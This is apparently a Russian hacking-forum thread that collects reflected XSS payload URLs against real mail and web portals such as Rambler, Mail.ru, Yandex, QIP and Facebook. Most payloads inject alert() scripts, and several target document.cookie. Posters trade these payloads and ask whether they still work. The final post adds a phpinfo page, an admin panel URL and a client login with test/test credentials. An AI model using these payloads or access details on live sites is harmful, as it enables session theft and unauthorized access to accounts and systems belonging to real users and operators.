![]() |
Пассивные xss на почтовых серверах
Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема)
Оффтоп наказуем p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету |
rambler.ru
http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert%20('XSS')%3C/script%3E |
http://top100.rambler.ru/cgi-bin/reg...p=0®=accept
Во всех полях вставляем "><script>alert('xss')</script> http://goon.ru/i/phone/rus_moscow.htm В поле Поиск по фамилии "><script>alert('xss')</script> http://catalog.aport.ru/rus/add/AddUrl.aspx В Адрес ресурса вставляем "><script>alert('xss')</script> |
Ramber.ru
http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>aler t(/TreV@N/)</script> http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert( 'TreV@N')</script>&form=0&hu=1&what=0 http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&wha t=0"><script>alert('TreV@N')</script> http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script >alert('TreV@N')</script>&hu=1&what=0 |
Решил выложить XSS найденную лично мной
Код:
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E |
пара уязвимостей на qip:
http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E |
Цитата:
Код:
http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E |
http://inbox.uz/
'><script>alert(/xss/)</script> Уязвимые поля Логин и пароль. |
http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>
http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script> http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script> http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script> http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script> http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script> http://www.pisem.net/download.php/?file="><script>alert('XSS')</script> http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script> http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script> |
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script> http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script> http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer') </script> http://top100.rambler.ru/cgi-bin/register.cgi?group=49®=accept в поле URL Вашей страницы: Код: "><script>alert(document.cookie)</script |
Mail.сру
http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phras e=&proto=1&url=%22%3E%3Cscript%3Ealert%28document. cookie%29%3C%2Fscript%3E&title=&descr=&owner=&cper son=&email=&phone=&fax=&address=&keywords=&session _id=16073130&category_id=10993&category_name=%CC%E 5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4%EE%F0%EE%E2%FC%E5&p age=1&save=1 http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Lu ccifer')%3C%2Fscript%3E&password= http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealer t('Luccifer')%3C%2Fscript%3E&tld=ru&x=21&y=4 http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1 В поле сайтайта URL вводим: "><script>alert('Luccifer')</script> http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert( 'Luccifer')%3C/script%3E=470 http://hosting.mail.ru/ в поле логин вводим Код: "><script>alert('xss')</script> |
http://ds.rambler.ru/index.php?p=news&pubId=000000000000000000000000000 000000000000000000003&pubMode=%3Cscript%3Ealert()% 3C/script%3E
Была активная XSS, но топик для пассивных. |
Ну опять хсс убитого рамблера на котором даже те что есть не фиксят.
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5& form=0&hu=1&what=0 </title><script>alert('S0ulVortex')</script> |
http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим: "><script>alert('Luccifer')</script> http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert( 'Luccifer')%3C/script%3E=470 уже не работают?или я не то делаю? |
не работают.
Код:
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20f02')%3C/script%3E |
Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно
Цитата:
|
Gala.net
Код:
http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and |
ВШтате
Код:
http://vshtate.ru/reg?op=message&email=[XSS]Короче, бесполезная :( В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде. Непохек :( |
Facebook.com
Код:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscriptтолько толку от нее нету:( |
http://yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert("XSS%20from%20lm ns")</script>
|
Мой Круг [Яндекс]
Цитата:
|
m@il.com
Цитата:
|
МИРТЕСЕН
Код:
http://mirtesen.ru/groups/map#search&<script>alert(document.cookie)</script> |
Снова i.ua - на этот раз пассивка ;)
http://events.i.ua/search/?words=</title>XSS&type=text |
http://mail.kinozal.tv/
http://kinozal.tv/login.php?returnto={XSS} |
http://webmail.rin.ru/
http://search.rin.ru/?text={XSS} |
на сайте http://www.mylivepage.ru в поле для поиска
Цитата:
|
META.UA (Поисковик, почта...)
Цитата:
Ну и так, в придачу rutube.ru :D + раскрытие путей http://ru tube.ru/channels.html?dir=asc&order_by=alias%22%3E%3Cimg%2 0src=javascript:alert(document.cookie)%3E /var/virtual/rutube.ru/lib/Rutube/Obj/Channel.pm line 658 |
Mail.ru
Цитата:
|
e-mail.ru
Цитата:
|
e-mail.ru
Цитата:
|
Работает в IE
Код:
http://sysadmin.mail.ru/pforum/profile.php?mode=viewprofile&u="><script>alert(/xss/)</script> |
A.UA - унылый веб2.0 сервис (бета)
Цитата:
Цитата:
Цитата:
|
Rambler
Цитата:
|
Цитата:
|
yandex
Код:
http://old-kubok.yandex.ru/cgi/cert.pl?s=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E |
http://go.mail.ru/frame.html?imgurl=xss
|
http://gallery.icq.com/browse.php?search=search&term=%3Cscript%3Ealert(do cument.cookie)%3C/script%3E
|
http://paint.kards.qip.ru/compose/edit/2292/?card_id=xss
|
phpinfo
http://fo2.rambler.ru/info.php phpinfo хсс http://help.rambler.ru/feedback.html?s=7715&fio=%22%3E%3Cscript%3Ealert(/2fed/)%3C/script%3E админка http://in.fo2.rambler.ru/administrator/index.php? и ещё http://ad.rambler.ru/ CLIENTS LOGIN логин=test пасс=test |
| Время: 14:00 |